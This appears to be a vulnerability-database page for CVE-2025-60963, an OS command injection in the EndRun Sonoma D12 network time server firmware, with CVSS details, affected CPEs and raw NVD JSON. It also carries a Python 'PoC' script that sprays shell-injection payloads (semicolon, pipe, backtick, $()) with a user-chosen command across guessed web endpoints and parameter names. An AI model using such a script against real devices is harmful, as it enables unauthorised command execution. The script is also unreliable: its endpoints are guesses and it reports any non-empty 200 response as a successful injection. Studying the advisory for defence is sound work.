Security Vulnerability Report
中文
CVE-2025-60963 CVSS 8.2 HIGH

CVE-2025-60963

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:35:31

Description

OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, and gain sensitive information.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Sonoma D12 Network Time Server 固件版本 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-60963 - EndRun Sonoma D12 Network Time Server OS Command Injection PoC # Vulnerability: OS Command Injection in firmware 6010-0071-000 Ver 4.00 # CVSS: 8.2 (HIGH) # Author: Security Research import requests import sys import argparse def exploit(target_url, cmd): """ Exploit OS Command Injection vulnerability in EndRun Sonoma D12 NTP Server. The vulnerability exists in the web management interface where user-supplied input is passed directly to system commands without proper sanitization. """ # Common injection points in NTP server web interfaces # These endpoints may accept parameters that are passed to system commands injection_endpoints = [ "/admin/ntp_config", "/config/network", "/cgi-bin/ntpstatus", "/admin/diagnostics", "/api/v1/config" ] # Command injection payloads using common separators # The backtick, semicolon, pipe, and $() are common injection vectors payloads = [ f"; {cmd}", f"| {cmd}", f"`{cmd}`", f"$({cmd})", f"&& {cmd}", ] headers = { "User-Agent": "Mozilla/5.0 (compatible; SecurityResearch/1.0)", "Content-Type": "application/x-www-form-urlencoded" } for endpoint in injection_endpoints: for payload in payloads: try: # Attempt injection via various parameters params = { "hostname": payload, "ntp_server": payload, "ip_address": payload, "command": payload, "query": payload } url = f"{target_url.rstrip('/')}{endpoint}" response = requests.post(url, data=params, headers=headers, timeout=10, verify=False) # Check if command execution was successful if response.status_code == 200 and len(response.text) > 0: print(f"[+] Potential injection point: {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response snippet: {response.text[:500]}") return True except requests.exceptions.RequestException as e: continue return False def main(): parser = argparse.ArgumentParser(description="CVE-2025-60963 PoC - EndRun Sonoma D12 Command Injection") parser.add_argument("target", help="Target URL (e.g., http://192.168.1.100)") parser.add_argument("-c", "--cmd", default="id", help="Command to execute (default: id)") args = parser.parse_args() print(f"[*] Targeting: {args.target}") print(f"[*] Command to execute: {args.cmd}") print("[*] Attempting command injection...") if exploit(args.target, args.cmd): print("[+] Exploit completed - check output above") else: print("[-] No vulnerable endpoint found or injection failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60963", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:07.193", "lastModified": "2025-10-10T16:35:31.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, and gain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}